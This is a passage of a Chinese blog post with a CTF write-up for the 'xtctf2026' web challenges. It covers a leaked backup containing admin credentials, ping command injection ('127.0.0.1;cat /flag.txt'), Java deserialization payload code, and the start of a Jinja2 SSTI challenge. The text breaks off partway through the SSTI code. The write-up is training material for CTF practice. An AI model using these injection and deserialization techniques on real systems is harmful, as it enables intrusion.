

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/3.png">
  <link rel="icon" href="/img/3.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="AzumiSaki">
  <meta name="keywords" content="">
  
    <meta name="description" content="前言整体而言，web题太少了（是真不够拿分啊，pwn和re随便做几道就超过我了），但出的很好，一共四道，希望下次流量分析别再卡我了（祈祷） 签到这题考的是ping接口执行rce（很经典的一道题），首先进去后是一个登录框，先扫目录，发现有泄露backup备份目录  点进去看到有www.zip备份文件，下载下来，在config.php里面找到账号密码登录：admin&#x2F;Xt@2026#Web1!ops">
<meta property="og:type" content="article">
<meta property="og:title" content="第二届&quot;星途杯&quot;-xtctf2026-web全解wp">
<meta property="og:url" content="https://azumisaki.kdns.fr/2026/06/06/xtctf2026/index.html">
<meta property="og:site_name" content="Saki的博客">
<meta property="og:description" content="前言整体而言，web题太少了（是真不够拿分啊，pwn和re随便做几道就超过我了），但出的很好，一共四道，希望下次流量分析别再卡我了（祈祷） 签到这题考的是ping接口执行rce（很经典的一道题），首先进去后是一个登录框，先扫目录，发现有泄露backup备份目录  点进去看到有www.zip备份文件，下载下来，在config.php里面找到账号密码登录：admin&#x2F;Xt@2026#Web1!ops">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://azumisaki.kdns.fr/img/16.jpeg">
<meta property="article:published_time" content="2026-06-06T08:51:58.000Z">
<meta property="article:modified_time" content="2026-06-10T12:41:28.520Z">
<meta property="article:author" content="AzumiSaki">
<meta property="article:tag" content="-wp">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://azumisaki.kdns.fr/img/16.jpeg">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>第二届&#34;星途杯&#34;-xtctf2026-web全解wp - Saki的博客</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"azumisaki.kdns.fr","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  



  
<!-- hexo injector head_end start --><link rel="stylesheet" href="/css/custom.css"><!-- hexo injector head_end end --><meta name="generator" content="Hexo 8.1.1"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 100vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Saki的博客</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/16.jpeg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.5)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="第二届&#34;星途杯&#34;-xtctf2026-web全解wp"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2026-06-06 16:51" pubdate>
          2026年6月6日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1.9k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          16 分钟
        
      </span>
    

    
    
      
        <span id="busuanzi_container_page_pv" class="post-meta">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          本文阅读 <span id="busuanzi_value_page_pv">0</span> 次
        </span>

      
    
  </div>


        
      </div>

      
        <div class="scroll-down-bar">
          <i class="iconfont icon-arrowdown"></i>
        </div>
      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">第二届&#34;星途杯&#34;-xtctf2026-web全解wp</h1>
            
              <p id="updated-time" class="note note-info" style="">
                
                  
                    本文最后更新于 2026年6月10日 晚上
                  
                
              </p>
            
            
              <div class="markdown-body">
                
                <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>整体而言，web题太少了（是真不够拿分啊，pwn和re随便做几道就超过我了），但出的很好，一共四道，希望下次流量分析别再卡我了（祈祷）</p>
<h2 id="签到"><a href="#签到" class="headerlink" title="签到"></a>签到</h2><p>这题考的是ping接口执行rce（很经典的一道题），首先进去后是一个登录框，先扫目录，发现有泄露backup备份目录</p>
<p><img src="/img/xtctf2026/1.png" srcset="/img/loading.gif" lazyload></p>
<p>点进去看到有<a href="http://www.zip备份文件，下载下来，在config.php里面找到账号密码登录：admin/Xt@2026#Web1!ops">www.zip备份文件，下载下来，在config.php里面找到账号密码登录：admin/Xt@2026#Web1!ops</a></p>
<p><img src="/img/xtctf2026/2.png" srcset="/img/loading.gif" lazyload></p>
<p>然后看到ping接口，直接127.0.0.1;cat &#x2F;flag.txt拿到flag</p>
<p><img src="/img/xtctf2026/3.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="web2"><a href="#web2" class="headerlink" title="web2"></a>web2</h2><p>这题考的是基础java反序列化（用不着ysoserial的那种）</p>
<p>首先看到首页，依旧先扫目录，发现有backup泄露的两个java文件</p>
<p><img src="/img/xtctf2026/4.png" srcset="/img/loading.gif" lazyload></p>
<p>点开后依次分析以下内容</p>
<p>Order.java:</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">package</span> com.ctf.entity;<br><br><span class="hljs-keyword">import</span> java.io.IOException;<br><span class="hljs-keyword">import</span> java.io.ObjectInputStream;<br><span class="hljs-keyword">import</span> java.io.Serializable;<br><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">Order</span> <span class="hljs-keyword">implements</span> <span class="hljs-title class_">Serializable</span> &#123;<br><br>    <span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">final</span> <span class="hljs-type">long</span> <span class="hljs-variable">serialVersionUID</span> <span class="hljs-operator">=</span> <span class="hljs-number">1L</span>;<br><br>    <span class="hljs-keyword">private</span> Integer id;<br>    <span class="hljs-keyword">private</span> String userId;<br>    <span class="hljs-keyword">private</span> String content;<br>    <span class="hljs-keyword">private</span> String secret;<br><br>    <span class="hljs-comment">// 自定义反序列化方法，反序列化时会执行恶意命令</span><br>    <span class="hljs-keyword">private</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">readObject</span><span class="hljs-params">(ObjectInputStream in)</span> <span class="hljs-keyword">throws</span> IOException, ClassNotFoundException &#123;<br>        in.defaultReadObject();<br>        String[] cmd = &#123;<span class="hljs-string">&quot;/bin/sh&quot;</span>, <span class="hljs-string">&quot;-c&quot;</span>, <span class="hljs-string">&quot;cat /flag* 2&gt;&amp;1&quot;</span>&#125;;<br>        Runtime.getRuntime().exec(cmd);<br>    &#125;<br><br>    <span class="hljs-comment">// Getter 和 Setter 方法</span><br>    <span class="hljs-keyword">public</span> Integer <span class="hljs-title function_">getId</span><span class="hljs-params">()</span> &#123;<br>        <span class="hljs-keyword">return</span> id;<br>    &#125;<br><br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">setId</span><span class="hljs-params">(Integer id)</span> &#123;<br>        <span class="hljs-built_in">this</span>.id = id;<br>    &#125;<br><br>    <span class="hljs-keyword">public</span> String <span class="hljs-title function_">getUserId</span><span class="hljs-params">()</span> &#123;<br>        <span class="hljs-keyword">return</span> userId;<br>    &#125;<br><br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">setUserId</span><span class="hljs-params">(String userId)</span> &#123;<br>        <span class="hljs-built_in">this</span>.userId = userId;<br>    &#125;<br><br>    <span class="hljs-keyword">public</span> String <span class="hljs-title function_">getContent</span><span class="hljs-params">()</span> &#123;<br>        <span class="hljs-keyword">return</span> content;<br>    &#125;<br><br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">setContent</span><span class="hljs-params">(String content)</span> &#123;<br>        <span class="hljs-built_in">this</span>.content = content;<br>    &#125;<br><br>    <span class="hljs-keyword">public</span> String <span class="hljs-title function_">getSecret</span><span class="hljs-params">()</span> &#123;<br>        <span class="hljs-keyword">return</span> secret;<br>    &#125;<br><br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">setSecret</span><span class="hljs-params">(String secret)</span> &#123;<br>        <span class="hljs-built_in">this</span>.secret = secret;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>ApiController.java:</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">package</span> com.ctf.controller;<br><br><span class="hljs-keyword">import</span> com.ctf.entity.Order;<br><span class="hljs-keyword">import</span> org.springframework.web.bind.annotation.*;<br><span class="hljs-keyword">import</span> java.io.*;<br><span class="hljs-keyword">import</span> java.util.*;<br><br><span class="hljs-meta">@RestController</span><br><span class="hljs-meta">@RequestMapping(&quot;/api&quot;)</span><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">ApiController</span> &#123;<br><br>    <span class="hljs-comment">// 管理员密钥</span><br>    <span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">final</span> <span class="hljs-type">String</span> <span class="hljs-variable">ADMIN_SECRET</span> <span class="hljs-operator">=</span> <span class="hljs-string">&quot;CTF&#123;ORDER_SECRET_2025_ADMIN_KEY&#125;&quot;</span>;<br><br>    <span class="hljs-comment">/**</span><br><span class="hljs-comment">     * 反序列化接口</span><br><span class="hljs-comment">     * <span class="hljs-doctag">@param</span> params 请求参数 map，必须包含 secret 和 data</span><br><span class="hljs-comment">     * <span class="hljs-doctag">@return</span> 处理结果 map</span><br><span class="hljs-comment">     */</span><br>    <span class="hljs-meta">@PostMapping(&quot;/deserialize&quot;)</span><br>    <span class="hljs-keyword">public</span> Map&lt;String, Object&gt; <span class="hljs-title function_">process</span><span class="hljs-params">(<span class="hljs-meta">@RequestBody</span> Map&lt;String, String&gt; params)</span> &#123;<br>        Map&lt;String, Object&gt; result = <span class="hljs-keyword">new</span> <span class="hljs-title class_">HashMap</span>&lt;&gt;();<br><br>        <span class="hljs-type">String</span> <span class="hljs-variable">secret</span> <span class="hljs-operator">=</span> params.get(<span class="hljs-string">&quot;secret&quot;</span>);<br>        <span class="hljs-type">String</span> <span class="hljs-variable">data</span> <span class="hljs-operator">=</span> params.get(<span class="hljs-string">&quot;data&quot;</span>);<br><br>        <span class="hljs-comment">// 校验密钥</span><br>        <span class="hljs-keyword">if</span> (secret == <span class="hljs-literal">null</span> || !ADMIN_SECRET.equals(secret)) &#123;<br>            result.put(<span class="hljs-string">&quot;code&quot;</span>, <span class="hljs-number">403</span>);<br>            result.put(<span class="hljs-string">&quot;msg&quot;</span>, <span class="hljs-string">&quot;密钥错误&quot;</span>);<br>            <span class="hljs-keyword">return</span> result;<br>        &#125;<br><br>        <span class="hljs-keyword">try</span> &#123;<br>            <span class="hljs-comment">// 解码 Base64 数据</span><br>            <span class="hljs-type">byte</span>[] bytes = Base64.getDecoder().decode(data);<br><br>            <span class="hljs-comment">// 反序列化 Order 对象</span><br>            <span class="hljs-type">ByteArrayInputStream</span> <span class="hljs-variable">bais</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">ByteArrayInputStream</span>(bytes);<br>            <span class="hljs-type">ObjectInputStream</span> <span class="hljs-variable">ois</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">ObjectInputStream</span>(bais);<br>            <span class="hljs-type">Order</span> <span class="hljs-variable">order</span> <span class="hljs-operator">=</span> (Order) ois.readObject();<br>            ois.close();<br><br>            <span class="hljs-comment">// 成功返回</span><br>            result.put(<span class="hljs-string">&quot;code&quot;</span>, <span class="hljs-number">200</span>);<br>            result.put(<span class="hljs-string">&quot;msg&quot;</span>, <span class="hljs-string">&quot;success&quot;</span>);<br>            <span class="hljs-keyword">return</span> result;<br><br>        &#125; <span class="hljs-keyword">catch</span> (Exception e) &#123;<br>            <span class="hljs-comment">// 出现异常返回 500</span><br>            result.put(<span class="hljs-string">&quot;code&quot;</span>, <span class="hljs-number">500</span>);<br>            result.put(<span class="hljs-string">&quot;msg&quot;</span>, <span class="hljs-string">&quot;error&quot;</span>);<br>            <span class="hljs-keyword">return</span> result;<br>        &#125;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>其实还有个git泄露的，但是看不出来有啥用就没端上来（</p>
<p>回到ApiController.java，我们可以看到直接泄露执行密钥了（这个是要在传参的时候用到的）</p>
<p>然后再看到反序列化执行端口</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">try</span> &#123;<br>     	<span class="hljs-comment">// 解码 Base64 数据</span><br>     	<span class="hljs-type">byte</span>[] bytes = Base64.getDecoder().decode(data);<br><br>     	<span class="hljs-comment">// 反序列化 Order 对象</span><br>     	<span class="hljs-type">ByteArrayInputStream</span> <span class="hljs-variable">bais</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">ByteArrayInputStream</span>(bytes);<br>     	<span class="hljs-type">ObjectInputStream</span> <span class="hljs-variable">ois</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">ObjectInputStream</span>(bais);<br>     	<span class="hljs-type">Order</span> <span class="hljs-variable">order</span> <span class="hljs-operator">=</span> (Order) ois.readObject();<br>     	ois.close();<br><br>     	<span class="hljs-comment">// 成功返回</span><br>     	result.put(<span class="hljs-string">&quot;code&quot;</span>, <span class="hljs-number">200</span>);<br>     	result.put(<span class="hljs-string">&quot;msg&quot;</span>, <span class="hljs-string">&quot;success&quot;</span>);<br>     	<span class="hljs-keyword">return</span> result;<br>    <br>     &#125;<span class="hljs-keyword">catch</span> (Exception e) &#123;<br>            <span class="hljs-comment">// 出现异常返回 500</span><br>            result.put(<span class="hljs-string">&quot;code&quot;</span>, <span class="hljs-number">500</span>);<br>            result.put(<span class="hljs-string">&quot;msg&quot;</span>, <span class="hljs-string">&quot;error&quot;</span>);<br>            <span class="hljs-keyword">return</span> result;<br>        &#125;<br>    &#125;<br></code></pre></td></tr></table></figure>

<p>可以看到创建了两个新对象，然后会反序列化Order，并调用readObject()类</p>
<p>然后看到下面这里出题人给咱放了一点小水</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">private</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">readObject</span><span class="hljs-params">(ObjectInputStream in)</span> <span class="hljs-keyword">throws</span> IOException, ClassNotFoundException &#123;<br>        in.defaultReadObject();<br>        String[] cmd = &#123;<span class="hljs-string">&quot;/bin/sh&quot;</span>, <span class="hljs-string">&quot;-c&quot;</span>, <span class="hljs-string">&quot;cat /flag* 2&gt;&amp;1&quot;</span>&#125;;<br>        Runtime.getRuntime().exec(cmd);<br>    &#125;<br></code></pre></td></tr></table></figure>

<p>这里显示是只要反序列化通过就直接回显flag，随后就是一些传参的方法</p>
<p>剩下一点小坑只要注意一下我们写的Order.java里面含有<code>package com.ctf.entity</code>就可以了</p>
<p>因为比赛只准用豆包，这里就先自己写一个Order.java，然后再丢给ai让他帮我生成pay.java吧</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">package</span> com.ctf.entity;<br><br><span class="hljs-keyword">import</span> java.io.Serializable;<br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">Order</span> <span class="hljs-keyword">implements</span> <span class="hljs-title class_">Serializable</span>&#123;<br>    <span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">final</span> <span class="hljs-type">long</span> serialVersionUID=<span class="hljs-number">1L</span>;<br>    <span class="hljs-keyword">private</span> Integer id;<br>    <span class="hljs-keyword">private</span> String userId;<br>    <span class="hljs-keyword">private</span> String content;<br>    <span class="hljs-keyword">private</span> String secret;<br><br>    <span class="hljs-keyword">public</span> <span class="hljs-title function_">Order</span><span class="hljs-params">()</span> &#123;&#125;<br>    <br>    <span class="hljs-keyword">public</span> <span class="hljs-title function_">Order</span><span class="hljs-params">(Integer id,String userId,String content,String secret)</span>&#123;<br>        <span class="hljs-built_in">this</span>.id=id;<br>        <span class="hljs-built_in">this</span>.userId=userId;<br>        <span class="hljs-built_in">this</span>.content=content;<br>        <span class="hljs-built_in">this</span>.secret=secret;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>ai生成pay.java</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">package</span> com.ctf.entity;<br><br><span class="hljs-keyword">import</span> java.io.ByteArrayOutputStream;<br><span class="hljs-keyword">import</span> java.io.ObjectOutputStream;<br><span class="hljs-keyword">import</span> java.util.Base64;<br><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">pay</span> &#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">main</span><span class="hljs-params">(String[] args)</span> &#123;<br>        <span class="hljs-keyword">try</span> &#123;<br>            <span class="hljs-comment">// ✅ 核心：反射创建对象，完全不直接调用 new Order()</span><br>            <span class="hljs-type">Order</span> <span class="hljs-variable">order</span> <span class="hljs-operator">=</span> Order.class.getDeclaredConstructor().newInstance();<br><br>            <span class="hljs-comment">// 序列化</span><br>            <span class="hljs-type">ByteArrayOutputStream</span> <span class="hljs-variable">baos</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">ByteArrayOutputStream</span>();<br>            <span class="hljs-type">ObjectOutputStream</span> <span class="hljs-variable">oos</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">ObjectOutputStream</span>(baos);<br>            oos.writeObject(order);<br>            oos.close();<br><br>            <span class="hljs-comment">// 输出Payload</span><br>            <span class="hljs-type">String</span> <span class="hljs-variable">payload</span> <span class="hljs-operator">=</span> Base64.getEncoder().encodeToString(baos.toByteArray());<br>            System.out.println(payload);<br><br>        &#125; <span class="hljs-keyword">catch</span> (Exception e) &#123;<br>            e.printStackTrace();<br>        &#125;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>另外这里还有一个细节，就是要构造好与package相同结构的文件夹</p>
<p><img src="/img/xtctf2026/5.png" srcset="/img/loading.gif" lazyload></p>
<p>运行拿到base64后传参，拿到flag</p>
<p><img src="/img/xtctf2026/6.png" srcset="/img/loading.gif" lazyload></p>
<p>flag{fbf48355-256e-447d-a2a4-39d24d60ff0f}</p>
<h2 id="S5T1"><a href="#S5T1" class="headerlink" title="S5T1"></a>S5T1</h2><p>这道题考ssti的jinjia2模板注入</p>
<p>首先先拿常规payload fuzz一波,发现他的回显始终是{“status”:”OK”},说明这是一个假200题，专门用来防焚靖的</p>
<p>然后再看到附件，发现他所支持的模块有</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs py">func_List = [<br>    <span class="hljs-string">&quot;get_close_matches&quot;</span>,<br>    <span class="hljs-string">&quot;dedent&quot;</span>,<br>    <span class="hljs-string">&quot;fmean&quot;</span>,<br>    <span class="hljs-string">&quot;listdir&quot;</span>,<br>    <span class="hljs-string">&quot;search&quot;</span>,<br>    <span class="hljs-string">&quot;randint&quot;</span>,<br>    <span class="hljs-string">&quot;load&quot;</span>,<br>    <span class="hljs-string">&quot;sum&quot;</span>,<br>    <span class="hljs-string">&quot;findall&quot;</span>,<br>    <span class="hljs-string">&quot;mean&quot;</span>,<br>    <span class="hljs-string">&quot;choice&quot;</span>,<br>]<br></code></pre></td></tr></table></figure>

<p>然后看到关键代码</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs py"><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&quot;/&quot;</span>, methods=[<span class="hljs-string">&quot;GET&quot;</span>, <span class="hljs-string">&quot;POST&quot;</span>]</span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">index</span>():<br>    submit = request.form.get(<span class="hljs-string">&quot;submit&quot;</span>)<br>    <span class="hljs-keyword">if</span> submit:<br>        <span class="hljs-keyword">try</span>:<br>            sys.settrace(trace_calls)<br>            sys.setprofile(trace_calls)<br>            rendered = render_template_string(submit)<br>        <span 